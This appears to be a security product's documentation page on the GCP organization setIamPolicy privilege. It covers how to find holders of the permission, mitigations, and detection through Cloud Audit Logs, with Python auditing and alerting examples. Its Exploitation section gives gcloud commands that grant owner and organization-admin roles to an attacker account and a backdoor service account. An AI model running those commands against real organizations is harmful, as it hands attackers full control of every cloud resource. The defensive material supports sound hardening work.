> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/gcp/gcp_can_set_org_iampolicy.md).

# GCP\_CAN\_SET\_ORG\_IAMPOLICY

## Summary

|                            |                                                                                     |
| -------------------------- | ----------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**    | GCP\_CAN\_SET\_ORG\_IAMPOLICY                                                       |
| **GCP Alias**              | IAM & Hierarchy Control                                                             |
| **Affected Object Types**  | Organizations                                                                       |
| **Exploitation Certainty** | Certain                                                                             |
| **Granting Roles**         | `roles/owner`, `roles/resourcemanager.organizationAdmin`, `roles/iam.securityAdmin` |

## Description

`GCP_CAN_SET_ORG_IAMPOLICY` indicates that an identity can call `setIamPolicy` on the GCP **Organization** resource. This is the highest-privilege IAM write operation in the GCP resource hierarchy — a principal with this edge can grant any role to any identity at the organization root, which propagates down to every folder and project beneath it.

An attacker who obtains this permission can instantly escalate to full organization control by granting themselves (or a backdoor identity) `roles/owner` at the org level, effectively compromising every resource in the organization.

**Key abuse scenarios:**

* Grant `roles/owner` to a controlled identity at org scope.
* Add an external attacker-controlled service account as `roles/resourcemanager.organizationAdmin`.
* Grant `roles/iam.serviceAccountTokenCreator` on a high-privilege SA to enable token generation from anywhere.

## Identification

### gcloud CLI

```bash
# Resolve the numeric organization ID (first org the caller can see) and list
# who holds an org-level role that includes resourcemanager.organizations.setIamPolicy
ORG_ID=$(gcloud organizations list --format="value(name.basename())" | head -1)
gcloud organizations get-iam-policy "$ORG_ID" --format=json | \
  jq '.bindings[] | select(.role == "roles/owner" or .role == "roles/resourcemanager.organizationAdmin" or .role == "roles/iam.securityAdmin") | {role: .role, members: .members, condition: .condition}'

# The role-name filter above misses custom roles; check each org-level custom role for the permission
for ROLE in $(gcloud iam roles list --organization="$ORG_ID" --format="value(name.basename())"); do
  gcloud iam roles describe "$ROLE" --organization="$ORG_ID" --format="value(includedPermissions)" | \
    grep -q "resourcemanager.organizations.setIamPolicy" && echo "custom role grants org setIamPolicy: $ROLE"
done
```

### GCP Console

1. Open **GCP Console** → **IAM & Admin** → **IAM**.
2. Select the **Organization** from the resource selector at the top.
3. Review all principals with `Owner`, `Organization Admin`, or `Security Admin` roles, including bindings that carry an IAM condition (a time-boxed break-glass binding still grants the permission while the condition holds).
4. Check any custom role bound at organization scope for the `resourcemanager.organizations.setIamPolicy` permission; the role name alone does not reveal it.
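The jq filter above matches on role names, so a custom role that happens to carry `resourcemanager.organizations.setIamPolicy` slips through. The following Python script is an added example (not FSProtect's own code) that resolves every bound role to its permissions before deciding who can set the org policy, flags conditional bindings, and separates principals that are public, outside the organization's domain, or service accounts from foreign projects. It reads the JSON that `gcloud organizations get-iam-policy ORG_ID --format=json` prints; the role-to-permission map, the policy, the domain `example.com`, the org ID `123456789012` and the project list are constructed sample data.

```python
"""Who can call setIamPolicy on the organization?

Added example, not FSProtect's own code. Input is the JSON printed by
`gcloud organizations get-iam-policy ORG_ID --format=json`; unlike a
role-name filter it resolves roles to permissions, so custom roles that
carry resourcemanager.organizations.setIamPolicy are caught too. The
role map, policy, domain and project list below are constructed.
"""
import json

TARGET_PERMISSION = "resourcemanager.organizations.setIamPolicy"
PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}

# Constructed role -> permissions map. Build the real one with
# `gcloud iam roles describe ROLE --format=json` for every role bound in the
# policy; custom roles live under organizations/ORG_ID/roles/NAME.
ROLE_PERMISSIONS = {
    "roles/owner": {TARGET_PERMISSION, "resourcemanager.organizations.getIamPolicy"},
    "roles/resourcemanager.organizationAdmin": {TARGET_PERMISSION, "resourcemanager.organizations.getIamPolicy"},
    "roles/iam.securityAdmin": {TARGET_PERMISSION, "resourcemanager.organizations.getIamPolicy"},
    "roles/viewer": {"resourcemanager.organizations.get"},
    # Innocuous name, dangerous permission: a role-name grep would miss this.
    "organizations/123456789012/roles/platformReader": {"resourcemanager.organizations.get", TARGET_PERMISSION},
}

# Constructed org IAM policy in the shape gcloud prints.
SAMPLE_POLICY = json.loads("""{
  "version": 3,
  "bindings": [
    {"role": "roles/resourcemanager.organizationAdmin",
     "members": ["group:org-admins@example.com", "user:alice@example.com"]},
    {"role": "roles/owner",
     "members": ["user:mallory@contractor.example"]},
    {"role": "roles/viewer",
     "members": ["domain:example.com"]},
    {"role": "organizations/123456789012/roles/platformReader",
     "members": ["serviceAccount:ci@build-prj.iam.gserviceaccount.com"]},
    {"role": "roles/iam.securityAdmin",
     "members": ["user:bob@example.com"],
     "condition": {"title": "break-glass window",
                   "expression": "request.time < timestamp('2030-01-01T00:00:00Z')"}}
  ]
}""")


def find_org_policy_setters(policy, role_permissions):
    """Map member -> [(role, is_conditional)] for every binding whose role
    carries the org setIamPolicy permission. Unknown roles raise rather than
    silently pass, since an unresolved role could be the dangerous one."""
    holders = {}
    for binding in policy.get("bindings", []):
        role = binding["role"]
        if role not in role_permissions:
            raise KeyError(f"no permission map for {role}; describe it before trusting this result")
        if TARGET_PERMISSION not in role_permissions[role]:
            continue
        conditional = "condition" in binding
        for member in binding.get("members", []):
            holders.setdefault(member, []).append((role, conditional))
    return holders


def external_members(holders, org_domain, org_project_ids):
    """Holders that are public, outside org_domain, or service accounts from
    projects not in org_project_ids (the backdoor pattern from the Description)."""
    external = set()
    for member in holders:
        if member in PUBLIC_PRINCIPALS:
            external.add(member)
            continue
        kind, _, ident = member.partition(":")
        if kind == "serviceAccount":
            # ci@build-prj.iam.gserviceaccount.com -> build-prj
            project = ident.split("@", 1)[1].split(".", 1)[0]
            if project not in org_project_ids:
                external.add(member)
        elif kind in ("user", "group") and not ident.endswith("@" + org_domain):
            external.add(member)
    return external


if __name__ == "__main__":
    holders = find_org_policy_setters(SAMPLE_POLICY, ROLE_PERMISSIONS)
    for member, grants in sorted(holders.items()):
        print(member, grants)
    print("external:", external_members(holders, "example.com", {"build-prj"}))
```

On the sample policy the script reports the group, alice, bob (conditional), the contractor account holding `roles/owner` and the CI service account that inherits the permission through the custom role, while `domain:example.com` with `roles/viewer` is correctly ignored; only `user:mallory@contractor.example` is classified as external. Google-managed service agents (`service-…@gcp-sa-….iam.gserviceaccount.com`) will also show up as external under this simple project check and need their own allow-list.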

## Exploitation

With `setIamPolicy` on the organization, an attacker can grant themselves or a backdoor identity any role organization-wide.

### gcloud CLI

```bash
# Grant owner to an attacker-controlled account at org level.
# add-iam-policy-binding reads the current policy, appends the binding and writes
# it back, so it needs getIamPolicy as well as setIamPolicy on the organization.
ORG_ID=$(gcloud organizations list --format="value(name.basename())" | head -1)
gcloud organizations add-iam-policy-binding "$ORG_ID" \
  --member="user:attacker@evil.com" \
  --role="roles/owner"

# Add a backdoor service account from an attacker-controlled project as org admin.
# This binding is rejected if domain restricted sharing is enforced (see Mitigation).
gcloud organizations add-iam-policy-binding "$ORG_ID" \
  --member="serviceAccount:backdoor@attacker-project.iam.gserviceaccount.com" \
  --role="roles/resourcemanager.organizationAdmin"
```

**Compound path:** `GCP_CAN_SET_ORG_IAMPOLICY` → grant `roles/iam.serviceAccountTokenCreator` on a high-privilege SA → `GCP_CAN_IMPERSONATE_SA` → full org access via token generation.

## Mitigation

1. **Restrict org IAM admin roles to break-glass identities.** Remove `roles/owner`, `roles/resourcemanager.organizationAdmin`, and `roles/iam.securityAdmin` from user accounts and service accounts that do not strictly require them, and review custom roles bound at org scope for `resourcemanager.organizations.setIamPolicy`.
2. **Enforce domain restricted sharing.** Enable the `constraints/iam.managed.allowedPolicyMembers` org policy (or the legacy `constraints/iam.allowedPolicyMemberDomains`) so that bindings to principals outside your organization's domain are rejected at write time. This blocks the external-user and foreign-project service account grants shown above, but not a grant to an already-compromised internal identity, and a principal with org-level IAM control can grant themselves `roles/orgpolicy.policyAdmin` and lift the constraint.
3. **Audit org-level bindings regularly.** Compare the output of `gcloud organizations get-iam-policy` against a known-good baseline and treat any unexplained change as an incident.
4. **Enable VPC Service Controls and Access Context Manager** to limit data access even if org IAM is compromised. This raises the attacker's cost rather than removing the risk: an org-level IAM admin can also grant themselves the rights to edit the perimeters.

## Detection

Monitor **Cloud Audit Logs** for `SetIamPolicy` calls on organization resources.

| Log Type                    | Method         | Key Fields                                                                                                                    |
| --------------------------- | -------------- | ----------------------------------------------------------------------------------------------------------------------------- |
| Admin Activity (always on)  | `SetIamPolicy` | `resource.type="organization"`, `protoPayload.methodName="SetIamPolicy"`, `protoPayload.serviceName="cloudresourcemanager.googleapis.com"`, `protoPayload.serviceData.policyDelta.bindingDeltas` |
| Data Access (`ADMIN_READ`, must be enabled for Resource Manager) | `GetIamPolicy` | `resource.type="organization"`, `protoPayload.methodName="GetIamPolicy"`                                                     |

```bash
# Query Cloud Audit Logs for org-level IAM policy changes over the last 7 days.
# --organization needs the numeric ID; bindingDeltas shows exactly which bindings were added or removed.
ORG_ID=$(gcloud organizations list --format="value(name.basename())" | head -1)
gcloud logging read \
  'resource.type="organization" AND protoPayload.methodName="SetIamPolicy"' \
  --organization="$ORG_ID" --freshness=7d \
  --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, protoPayload.status.code, protoPayload.serviceData.policyDelta.bindingDeltas)"
```

Alert on:

* Any `SetIamPolicy` call on the organization resource, including denied attempts (`protoPayload.status.code` != 0), which indicate a principal probing for this edge. Allow-list the break-glass identities to keep the alert actionable.
* New `ADD` binding deltas for `roles/owner`, `roles/resourcemanager.organizationAdmin`, `roles/iam.securityAdmin`, or any custom role carrying `resourcemanager.organizations.setIamPolicy` at org scope.
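The detection logic above, as an added example that is not FSProtect's own code: a Python function that takes the JSON list printed by `gcloud logging read … --format=json`, keeps only `SetIamPolicy` entries on the organization resource, and raises one alert per suspicious entry using the binding deltas Resource Manager records under `protoPayload.serviceData.policyDelta`. The four log entries, the break-glass allow-list (`alice@example.com`), the principals and the org ID `123456789012` are constructed; the sensitive-role set is the one from the table above.

```python
"""Alert on org-level SetIamPolicy from Cloud Audit Logs.

Added example, not FSProtect's own code. Input is the JSON list printed by
`gcloud logging read ... --format=json`; it reads the binding deltas that
Resource Manager records under protoPayload.serviceData.policyDelta and
raises on sensitive additions, non-allow-listed actors and denied attempts.
The entries, principals, allow-list and org ID below are constructed.
"""
import json

SENSITIVE_ROLES = {
    "roles/owner",
    "roles/resourcemanager.organizationAdmin",
    "roles/iam.securityAdmin",
}
# Assumed break-glass allow-list; principalEmail carries no "user:" prefix.
BREAK_GLASS_ACTORS = {"alice@example.com"}

# Constructed entries: a project-level change (ignored), a benign org change by a
# break-glass identity, an org owner grant to an external user, and a denied attempt.
SAMPLE_ENTRIES = json.loads("""[
  {"timestamp": "2024-05-01T10:00:00Z",
   "resource": {"type": "project", "labels": {"project_id": "build-prj"}},
   "protoPayload": {"methodName": "SetIamPolicy",
     "authenticationInfo": {"principalEmail": "alice@example.com"},
     "serviceData": {"policyDelta": {"bindingDeltas": [
       {"action": "ADD", "role": "roles/owner", "member": "user:dave@example.com"}]}}}},
  {"timestamp": "2024-05-01T10:05:00Z",
   "resource": {"type": "organization", "labels": {"organization_id": "123456789012"}},
   "protoPayload": {"methodName": "SetIamPolicy",
     "authenticationInfo": {"principalEmail": "alice@example.com"},
     "serviceData": {"policyDelta": {"bindingDeltas": [
       {"action": "ADD", "role": "roles/viewer", "member": "group:auditors@example.com"}]}}}},
  {"timestamp": "2024-05-01T10:07:00Z",
   "resource": {"type": "organization", "labels": {"organization_id": "123456789012"}},
   "protoPayload": {"methodName": "SetIamPolicy",
     "authenticationInfo": {"principalEmail": "mallory@example.com"},
     "serviceData": {"policyDelta": {"bindingDeltas": [
       {"action": "REMOVE", "role": "roles/viewer", "member": "group:auditors@example.com"},
       {"action": "ADD", "role": "roles/owner", "member": "user:attacker@evil.com"}]}}}},
  {"timestamp": "2024-05-01T10:09:00Z",
   "resource": {"type": "organization", "labels": {"organization_id": "123456789012"}},
   "protoPayload": {"methodName": "SetIamPolicy",
     "status": {"code": 7, "message": "PERMISSION_DENIED"},
     "authenticationInfo": {"principalEmail": "carol@example.com"}}}
]""")


def org_iam_alerts(entries, sensitive_roles=SENSITIVE_ROLES, allowed_actors=BREAK_GLASS_ACTORS):
    """One alert per org-level SetIamPolicy entry that is suspicious.
    Severity is CRITICAL when a sensitive role was added, HIGH for a denied
    attempt or an actor outside the allow-list; a benign change by a
    break-glass identity produces no alert."""
    alerts = []
    for entry in entries:
        payload = entry.get("protoPayload", {})
        if entry.get("resource", {}).get("type") != "organization":
            continue  # project/folder changes belong to other edges
        if payload.get("methodName") != "SetIamPolicy":
            continue
        actor = payload.get("authenticationInfo", {}).get("principalEmail", "<unknown>")
        denied = payload.get("status", {}).get("code", 0) != 0
        deltas = payload.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", [])
        added = [(d["role"], d["member"]) for d in deltas if d.get("action") == "ADD"]
        reasons = []
        if denied:
            reasons.append("denied SetIamPolicy attempt on the organization")
        if actor not in allowed_actors:
            reasons.append("actor is not a break-glass identity")
        sensitive = [(r, m) for r, m in added if r in sensitive_roles]
        if sensitive:
            reasons.append("sensitive role added at org scope")
        if not reasons:
            continue
        alerts.append({
            "timestamp": entry.get("timestamp"),
            "organization_id": entry["resource"].get("labels", {}).get("organization_id"),
            "actor": actor,
            "severity": "CRITICAL" if sensitive else "HIGH",
            "reasons": reasons,
            "added": added,
        })
    return alerts


if __name__ == "__main__":
    for alert in org_iam_alerts(SAMPLE_ENTRIES):
        print(json.dumps(alert))
```

Run against the sample, the function yields two alerts: a CRITICAL one for `mallory@example.com` adding `roles/owner` for `user:attacker@evil.com` (the REMOVE delta in the same call is reported in the log but does not change severity), and a HIGH one for `carol@example.com`'s denied attempt. The project-level entry is skipped and alice's `roles/viewer` grant is silent because she is on the allow-list and the role is not sensitive. Extend `SENSITIVE_ROLES` with any custom role found to carry `resourcemanager.organizations.setIamPolicy`.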

## References

* <https://cloud.google.com/resource-manager/docs/access-control-org>

